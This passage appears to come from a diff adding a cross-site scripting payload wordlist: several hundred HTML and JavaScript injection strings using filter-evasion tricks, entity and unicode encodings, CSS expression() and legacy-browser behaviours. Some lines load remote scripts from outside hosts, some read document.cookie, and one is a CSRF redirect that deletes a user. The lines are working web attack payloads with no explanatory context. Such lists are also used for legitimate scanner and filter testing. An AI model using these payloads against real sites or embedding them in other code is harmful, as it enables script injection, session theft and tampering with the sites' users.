+ <img\x11src=x onerror="javascript:alert(1)">
1759
+ <img \x47src=x onerror="javascript:alert(1)">
1760
+ <img \x34src=x onerror="javascript:alert(1)">
1761
+ <img \x39src=x onerror="javascript:alert(1)">
1762
+ <img \x00src=x onerror="javascript:alert(1)">
1763
+ <img src\x09=x onerror="javascript:alert(1)">
1764
+ <img src\x10=x onerror="javascript:alert(1)">
1765
+ <img src\x13=x onerror="javascript:alert(1)">
1766
+ <img src\x32=x onerror="javascript:alert(1)">
1767
+ <img src\x12=x onerror="javascript:alert(1)">
1768
+ <img src\x11=x onerror="javascript:alert(1)">
1769
+ <img src\x00=x onerror="javascript:alert(1)">
1770
+ <img src\x47=x onerror="javascript:alert(1)">
1771
+ <img src=x\x09onerror="javascript:alert(1)">
1772
+ <img src=x\x10onerror="javascript:alert(1)">
1773
+ <img src=x\x11onerror="javascript:alert(1)">
1774
+ <img src=x\x12onerror="javascript:alert(1)">
1775
+ <img src=x\x13onerror="javascript:alert(1)">
1776
+ <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
1777
+ <img src=x onerror=\x09"javascript:alert(1)">
1778
+ <img src=x onerror=\x10"javascript:alert(1)">
1779
+ <img src=x onerror=\x11"javascript:alert(1)">
1780
+ <img src=x onerror=\x12"javascript:alert(1)">
1781
+ <img src=x onerror=\x32"javascript:alert(1)">
1782
+ <img src=x onerror=\x00"javascript:alert(1)">
1783
+ <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
1784
+ <img src="x` `<script>javascript:alert(1)</script>"` `>
1785
+ <img src onerror /" '"= alt=javascript:alert(1)//">
1786
+ <title onpropertychange=javascript:alert(1)></title><title title=>
1787
+ <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
1788
+ <!--[if]><script>javascript:alert(1)</script -->
1789
+ <!--[if<img src=x onerror=javascript:alert(1)//]> -->
1790
+ <script src="/\%(jscript)s"></script>
1791
+ <script src="\\%(jscript)s"></script>
1792
+ <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
1793
+ <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
1794
+ <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
1795
+ <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
1796
+ <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
1797
+ <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
1798
+ <style>*[{}@import'%(css)s?]</style>X
1799
+ <div style="font-family:'foo&#10;;color:red;';">XXX
1800
+ <div style="font-family:foo}color=red;">XXX
1801
+ <// style=x:expression\28javascript:alert(1)\29>
1802
+ <style>*{x:expression(javascript:alert(1))}</style>
1803
+ <div style=content:url(%(svg)s)></div>
1804
+ <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
1805
+ <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
1806
+ <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
1807
+ <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
1808
+ <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
1809
+ <x style="background:url('x&#1;;color:red;/*')">XXX</x>
1810
+ <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
1811
+ <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
1812
+ <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
1813
+ <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
1814
+ <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
1815
+ <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
1816
+ <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
1817
+ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1818
+ 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
1819
+ 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
1820
+ <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1821
+ 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
1822
+ <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
1823
+ <x style="behavior:url(%(sct)s)">
1824
+ <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
1825
+ <event-source src="%(event)s" onload="javascript:alert(1)">
1826
+ <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
1827
+ <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
1828
+ <script>%(payload)s</script>
1829
+ <script src=%(jscript)s></script>
1830
+ <script language='javascript' src='%(jscript)s'></script>
1831
+ <script>javascript:alert(1)</script>
1832
+ <IMG SRC="javascript:javascript:alert(1);">
1833
+ <IMG SRC=javascript:javascript:alert(1)>
1834
+ <IMG SRC=`javascript:javascript:alert(1)`>
1835
+ <SCRIPT SRC=%(jscript)s?<B>
1836
+ <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
1837
+ <BODY ONLOAD=javascript:alert(1)>
1838
+ <BODY ONLOAD=javascript:javascript:alert(1)>
1839
+ <IMG SRC="jav ascript:javascript:alert(1);">
1840
+ <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
1841
+ <SCRIPT/SRC="%(jscript)s"></SCRIPT>
1842
+ <<SCRIPT>%(payload)s//<</SCRIPT>
1843
+ <IMG SRC="javascript:javascript:alert(1)"
1844
+ <iframe src=%(scriptlet)s <
1845
+ <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
1846
+ <IMG DYNSRC="javascript:javascript:alert(1)">
1847
+ <IMG LOWSRC="javascript:javascript:alert(1)">
1848
+ <BGSOUND SRC="javascript:javascript:alert(1);">
1849
+ <BR SIZE="&{javascript:alert(1)}">
1850
+ <LAYER SRC="%(scriptlet)s"></LAYER>
1851
+ <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
1852
+ <STYLE>@import'%(css)s';</STYLE>
1853
+ <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
1854
+ <XSS STYLE="behavior: url(%(htc)s);">
1855
+ <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
1856
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
1857
+ <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
1858
+ <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
1859
+ <TABLE BACKGROUND="javascript:javascript:alert(1)">
1860
+ <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
1861
+ <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
1862
+ <DIV STYLE="width:expression(javascript:alert(1));">
1863
+ <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
1864
+ <XSS STYLE="xss:expression(javascript:alert(1))">
1865
+ <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
1866
+ <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
1867
+ <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
1868
+ <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
1869
+ <BASE HREF="javascript:javascript:alert(1);//">
1870
+ <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
1871
+ <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
1872
+ <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
1873
+ <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
1874
+ <SCRIPT SRC="%(jpg)s"></SCRIPT>
1875
+ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
1876
+ <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
1877
+ <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
1878
+ <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
1879
+ <STYLE>@import'%(css)s';</STYLE>
1880
+ <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
1881
+ <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
1882
+ <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
1883
+ <style onreadystatechange=javascript:javascript:alert(1);></style>
1884
+ <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
1885
+ <embed code=%(scriptlet)s></embed>
1886
+ <embed code=javascript:javascript:alert(1);></embed>
1887
+ <embed src=%(jscript)s></embed>
1888
+ <frameset onload=javascript:javascript:alert(1)></frameset>
1889
+ <object onerror=javascript:javascript:alert(1)>
1890
+ <embed type="image" src=%(scriptlet)s></embed>
1891
+ <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
1892
+ <IMG SRC=&{javascript:alert(1);};>
1893
+ <a href="jav&#65ascript:javascript:alert(1)">test1</a>
1894
+ <a href="jav&#97ascript:javascript:alert(1)">test1</a>
1895
+ <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
1896
+ <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
1897
+ ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
1898
+ alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
1899
+ ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
1900
+ '';!--"<XSS>=&{()}
1901
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
1902
+ <IMG SRC="javascript:alert('XSS');">
1903
+ <IMG SRC=javascript:alert('XSS')>
1904
+ <IMG SRC=JaVaScRiPt:alert('XSS')>
1905
+ <IMG SRC=javascript:alert("XSS")>
1906
+ <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
1907
+ <a onmouseover="alert(document.cookie)">xxs link</a>
1908
+ <a onmouseover=alert(document.cookie)>xxs link</a>
1909
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
1910
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1911
+ <IMG SRC=# onmouseover="alert('xxs')">
1912
+ <IMG SRC= onmouseover="alert('xxs')">
1913
+ <IMG onmouseover="alert('xxs')">
1914
+ <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
1915
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
1916
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
1917
+ <IMG SRC="jav ascript:alert('XSS');">
1918
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
1919
+ <IMG SRC="jav&#x0A;ascript:alert('XSS');">
1920
+ <IMG SRC="jav&#x0D;ascript:alert('XSS');">
1921
+ perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
1922
+ <IMG SRC=" &#14; javascript:alert('XSS');">
1923
+ <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1924
+ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
1925
+ <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1926
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
1927
+ <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
1928
+ <SCRIPT SRC=//ha.ckers.org/.j>
1929
+ <IMG SRC="javascript:alert('XSS')"
1930
+ <iframe src=http://ha.ckers.org/scriptlet.html <
1931
+ \";alert('XSS');//
1932
+ </TITLE><SCRIPT>alert("XSS");</SCRIPT>
1933
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
1934
+ <BODY BACKGROUND="javascript:alert('XSS')">
1935
+ <IMG DYNSRC="javascript:alert('XSS')">
1936
+ <IMG LOWSRC="javascript:alert('XSS')">
1937
+ <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
1938
+ <IMG SRC='vbscript:msgbox("XSS")'>
1939
+ <IMG SRC="livescript:[code]">
1940
+ <BODY ONLOAD=alert('XSS')>
1941
+ <BGSOUND SRC="javascript:alert('XSS');">
1942
+ <BR SIZE="&{alert('XSS')}">
1943
+ <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
1944
+ <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
1945
+ <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
1946
+ <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
1947
+ <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
1948
+ <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
1949
+ <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
1950
+ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
1951
+ <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
1952
+ <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
1953
+ <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
1954
+ <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
1955
+ <XSS STYLE="xss:expression(alert('XSS'))">
1956
+ <XSS STYLE="behavior: url(xss.htc);">
1957
+ ¼script¾alert(¢XSS¢)¼/script¾
1958
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
1959
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
1960
+ <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
1961
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
1962
+ <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
1963
+ <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
1964
+ <TABLE BACKGROUND="javascript:alert('XSS')">
1965
+ <TABLE><TD BACKGROUND="javascript:alert('XSS')">
1966
+ <DIV STYLE="background-image: url(javascript:alert('XSS'))">
1967
+ <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
1968
+ <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
1969
+ <DIV STYLE="width: expression(alert('XSS'));">
1970
+ <BASE HREF="javascript:alert('XSS');//">
1971
+ <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
1972
+ <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
1973
+ <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
1974
+ <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
1975
+ <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
1976
+ <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
1977
+ Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
1978
+ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
1979
+ <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
1980
+ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1981
+ <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1982
+ <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1983
+ <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1984
+ <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1985
+ <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1986
+ <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
1987
+ <A HREF="http://66.102.7.147/">XSS</A>
1988
+ <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
1989
+ <A HREF="http://1113982867/">XSS</A>
1990
+ <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
1991
+ <A HREF="http://0102.0146.0007.00000223/">XSS</A>
1992
+ <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
1993
+ <iframe src="&Tab;javascript:prompt(1)&Tab;">
1994
+ <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
1995
+ <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
1996
+ <sVg><scRipt >alert&lpar;1&rpar; {Opera}
1997
+ <img/src=`` onerror=this.onerror=confirm(1)
1998
+ <form><isindex formaction="javascript&colon;confirm(1)"
1999
+ <img src=``&NewLine; onerror=alert(1)&NewLine;
2000
+ <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
2001
+ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
2002
+ <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
2003
+ <script /**/>/**/alert(1)/**/</script /**/
2004
+ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
2005
+ <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
2006
+ <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
2007
+ <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
2008
+ <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
2009
+ <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
2010
+ <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
2011
+ <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
2012
+ </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
2013
+ <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
2014
+ <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
2015
+ <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
2016
+ http://www.google<script .com>alert(document.location)</script
2017
+ <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
2018
+ <img/src=@&#32;&#13; onerror = prompt('&#49;')
2019
+ <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
2020
+ <script ^__^>alert(String.fromCharCode(49))</script ^__^
2021
+ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
2022
+ &#00;</form><input type&#61;"date" onfocus="alert(1)">
2023
+ <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
2024
+ <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
2025
+ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
2026
+ <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
2027
+ <script ~~~>alert(0%0)</script ~~~>
2028
+ <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
2029
+ <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
2030
+ <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
2031
+ &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
2032
+ &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
2033
+ <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
2034
+ <div/style="width:expression(confirm(1))">X</div> {IE7}
2035
+ <iframe// src=javaSCRIPT&colon;alert(1)
2036
+ //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
2037
+ /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
2038
+ //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
2039
+ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
2040
+ <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
2041
+ </plaintext\></|\><plaintext/onmouseover=prompt(1)
2042
+ </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
2043
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
2044
+ <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
2045
+ <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
2046
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
2047
+ <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
2048
+ <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
2049
+ <var onmouseover="prompt(1)">On Mouse Over</var>
2050
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
2051
+ <img src="/" =_=" title="onerror='prompt(1)'">
2052
+ <%<!--'%><script>alert(1);</script -->
2053
+ <script src="data:text/javascript,alert(1)"></script>
2054
+ <iframe/src \/\/onload = prompt(1)
2055
+ <iframe/onreadystatechange=alert(1)
2056
+ <svg/onload=alert(1)
2057
+ <input value=<><iframe/src=javascript:confirm(1)
2058
+ <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
2059
+ <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
2060
+ <img src=`xx:xx`onerror=alert(1)>
2061
+ <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
2062
+ <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
2063
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
2064
+ <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
2065
+ <svg contentScriptType=text/vbs><script>MsgBox+1
2066
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
2067
+ <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
2068
+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
2069
+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
2070
+ <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
2071
+ <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
2072
+ <script>+-+-1-+-+alert(1)</script>
2073
+ <body/onload=&lt;!--&gt;&#10alert(1)>
2074
+ <script itworksinallbrowsers>/*<script* */alert(1)</script
2075
+ <img src ?itworksonchrome?\/onerror = alert(1)
2076
+ <svg><script>//&NewLine;confirm(1);</script </svg>
2077
+ <svg><script onlypossibleinopera:-)> alert(1)
2078
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
2079
+ <script x> alert(1) </script 1=2
2080
+ <div/onmouseover='alert(1)'> style="x:">
2081
+ <--`<img/src=` onerror=alert(1)> --!>
2082
+ <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
2083
+ <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
2084
+ "><img src=x onerror=window.open('https://www.google.com/');>
2085
+ <form><button formaction=javascript&colon;alert(1)>CLICKME
2086
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
2087
+ <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
2088
+ <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
2089
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
2090
+ '';!--"<XSS>=&{()}
2091
+ '>//\\,<'>">">"*"
2092
+ '); alert('XSS
2093
+ <script>alert(1);</script>
2094
+ <script>alert('XSS');</script>
2095
+ <IMG SRC="javascript:alert('XSS');">
2096
+ <IMG SRC=javascript:alert('XSS')>
2097
+ <IMG SRC=javascript:alert('XSS')>
2098
+ <IMG SRC=javascript:alert(&quot;XSS&quot;)>
2099
+ <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
2100
+ <scr<script>ipt>alert('XSS');</scr</script>ipt>
2101
